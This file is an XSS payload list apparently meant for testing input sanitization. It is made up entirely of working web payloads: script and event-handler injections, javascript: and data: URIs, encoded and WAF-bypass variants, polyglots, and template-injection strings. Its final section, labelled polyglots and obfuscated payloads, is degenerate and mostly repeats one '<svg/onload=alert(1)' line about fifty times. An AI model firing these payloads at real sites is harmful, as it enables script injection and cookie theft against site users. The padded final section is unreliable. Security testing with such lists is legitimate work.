# XSS (Cross-Site Scripting) Payloads
# PURPOSE: Test if website properly sanitizes user input
# DANGER: These can steal cookies, redirect users, or execute malicious code

# Basic XSS
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.cookie)</script>

# Image-based XSS
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert(1)>
<img src="javascript:alert('XSS')">

# SVG-based XSS
<svg/onload=alert('XSS')>
<svg onload=alert(1)>

# Body tag XSS
<body onload=alert('XSS')>

# Input field XSS
"><script>alert('XSS')</script>
'><script>alert(String.fromCharCode(88,83,83))</script>

# Event handler XSS
<div onmouseover="alert('XSS')">Hover me</div>
<input onfocus=alert('XSS') autofocus>

# Iframe XSS
<iframe src="javascript:alert('XSS')"></iframe>

# Link-based XSS
<a href="javascript:alert('XSS')">Click me</a>

# Style XSS
<style>body{background:url('javascript:alert(1)')}</style>

# Encoded XSS (bypasses some filters)
&lt;script&gt;alert('XSS')&lt;/script&gt;
%3Cscript%3Ealert('XSS')%3C/script%3E

# Advanced/Obfuscated
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>
<script>alert(String.fromCharCode(88,83,83))</script>

# Filter Bypass Techniques
<ScRiPt>alert('XSS')</ScRiPt>
<script/src=data:text/javascript,alert('XSS')></script>
<script src=data:text/javascript;base64,YWxlcnQoJ1hTUycp></script>
<img src="" onerror="alert('XSS')">
<svg><script>alert('XSS')</script></svg>
<math><mi//xlink:href="data:x,<script>alert('XSS')</script>">
<iframe srcdoc="<script>alert('XSS')</script>"></iframe>

# Context-Based XSS
';alert('XSS');//
";alert('XSS');//
</script><script>alert('XSS')</script><script>
'-alert('XSS')-'
"-alert('XSS')-"
javascript:alert('XSS')
vbscript:alert('XSS')

# DOM-Based XSS
<img src=1 onerror="eval(atob('YWxlcnQoJ1hTUycp'))">
<svg onload="eval(String.fromCharCode(97,108,101,114,116,40,88,83,83,41))">
<iframe src="javascript:void(alert('XSS'))"></iframe>
<object data="javascript:alert('XSS')"></object>
<embed src="javascript:alert('XSS')">

# Event Handler Variations
<body onpageshow="alert('XSS')">
<input type="image" src=x onerror="alert('XSS')">
<select onfocus="alert('XSS')" autofocus>
<textarea onfocus="alert('XSS')" autofocus>
<keygen onfocus="alert('XSS')" autofocus>
<video poster=x onerror="alert('XSS')">
<audio src=x onerror="alert('XSS')">

# CSS-Based XSS
<link rel="stylesheet" href="javascript:alert('XSS')">
<style>@import'javascript:alert("XSS")';</style>
<style>body{background:url("javascript:alert('XSS')")}</style>
<div style="background:url(javascript:alert('XSS'))">

# Template and Framework Bypasses
{{constructor.constructor('alert("XSS")')()}}
${alert('XSS')}
#{alert('XSS')}
<%= alert('XSS') %>
{alert('XSS')}

# Protocol Handler XSS
<a href="javascript:alert('XSS')">click</a>
<a href="data:text/html,<script>alert('XSS')</script>">click</a>
<form action="javascript:alert('XSS')"><input type=submit>

# WAF Bypass Techniques
<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;">
<img src="x" onerror="eval('\x61\x6c\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29')">
<svg onload="&#97;&#108;&#101;&#114;&#116;&#40;1&#41;">
<script>eval('\141\154\145\162\164\50\47\130\123\123\47\51')</script>

# Polyglot Payloads
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS')//>\x3e
'">><marquee><img src=x onerror=confirm('XSS')></marquee>"></plaintext\></|\><script>prompt('XSS')</script>@gmail.com<isindex formaction=javascript:alert('XSS') type=submit>'-->"></script><script>alert('XSS')</script>"><img/id="confirm&lpar;'XSS'&rpar;"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">

# Modern Browser Bypasses
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="></iframe>
<iframe src="data:text/html,&lt;script&gt;alert('XSS')&lt;/script&gt;"></iframe>
<svg><foreignObject><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert('XSS')"></iframe></foreignObject></svg>

# Mutation-Based XSS
<listing>&lt;img src=1 onerror=alert('XSS')&gt;</listing>
<template><script>alert('XSS')</script></template>
<noscript><p title="</noscript><img src=x onerror=alert('XSS')>">

# Additional Vector Variations
<details open ontoggle="alert('XSS')">
<marquee onstart="alert('XSS')">
<menu id=x contextmenu=x onshow="alert('XSS')">
<form><button formaction="javascript:alert('XSS')">CLICKME
<input type="hidden" accesskey="X" onclick="alert('XSS')">

# File Upload Context
GIF89a/*<svg/onload=alert('XSS')>*/=alert('XSS')//;
<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')"/>

# Advanced Encoding Bypasses
%3cscript%3ealert('XSS')%3c/script%3e
&lt;script&gt;alert(&apos;XSS&apos;)&lt;/script&gt;
\u003cscript\u003ealert('XSS')\u003c/script\u003e
\x3cscript\x3ealert('XSS')\x3c/script\x3e

# BRUTAL MODE PAYLOADS (Advanced Polyglots & Obfuscation)
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
<body onload=alert(1)>
<iframe src=javascript:alert(1)>
<xss id=x tabindex=1 onfocus=alert(1)>
<img src=x:alert(alt) onerror=eval(src) alt=alert(1)>
<svg><script>alert(1)</script>
<svg><script>alert&lpar;1&rpar;</script>
<svg><script>alert&#40;1&#41;</script>
<svg><script>alert&#x28;1&#x29;</script>
<svg><script>alert&#x28;1&#x29;</script>
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert("XSS")</script>
<script>alert`XSS`</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body/onload=alert(1)>
<iframe/src=javascript:alert(1)>
<object/data=javascript:alert(1)>
<embed/src=javascript:alert(1)>
<a href=javascript:alert(1)>click</a>
<math><mi//xlink:href="data:x,<script>alert(1)</script>">
<textarea autofocus onfocus=alert(1)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<audio/src/onerror=alert(1)>
<details/open/ontoggle=alert(1)>
<form><button formaction=javascript:alert(1)>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>

# EXPANDED PAYLOADS BATCH 1
<script>alert(1)</script>
<script>confirm(1)</script>
<script>prompt(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body/onload=alert(1)>
<iframe/src=javascript:alert(1)>
<details/open/ontoggle=alert(1)>
<marquee/onstart=alert(1)>
<audio src onerror=alert(1)>
<video src onerror=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<input autofocus onfocus=alert(1)>
<form onsubmit=alert(1)>
<isindex formaction=javascript:alert(1)>
<xss id=x tabindex=1 onfocus=alert(1)>
<xss onpointerenter=alert(1)>
<xss onpointerleave=alert(1)>
<xss onpointermove=alert(1)>
<xss onpointerover=alert(1)>
<xss onpointerout=alert(1)>
<xss onpointerup=alert(1)>
<xss onpointerdown=alert(1)>
<xss onclick=alert(1)>
<xss oncontextmenu=alert(1)>
<xss ondblclick=alert(1)>
<xss onmousedown=alert(1)>
<xss onmouseenter=alert(1)>
<xss onmouseleave=alert(1)>
<xss onmousemove=alert(1)>
<xss onmouseout=alert(1)>
<xss onmouseover=alert(1)>
<xss onmouseup=alert(1)>
<xss onmousewheel=alert(1)>
<xss oncopy=alert(1)>
<xss oncut=alert(1)>
<xss onpaste=alert(1)>
<xss onblur=alert(1)>
<xss onchange=alert(1)>
<xss oninput=alert(1)>
<xss oninvalid=alert(1)>
<xss onreset=alert(1)>
<xss onsearch=alert(1)>
<xss onselect=alert(1)>
<xss onsubmit=alert(1)>
<xss onkeydown=alert(1)>
<xss onkeypress=alert(1)>
<xss onkeyup=alert(1)>

# EXPANDED PAYLOADS BATCH 2 (Polyglots & Obfuscated)
javascript://%250Aalert(1)//
<svg/onload=alert(1)<!--
<svg/onload=alert(1)//
<svg/onload=alert(1)
<svg/onload=alert(1)>
<svg/onload=alert(1)
<svg/onload=alert(1)//
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
<svg/onload=alert(1)
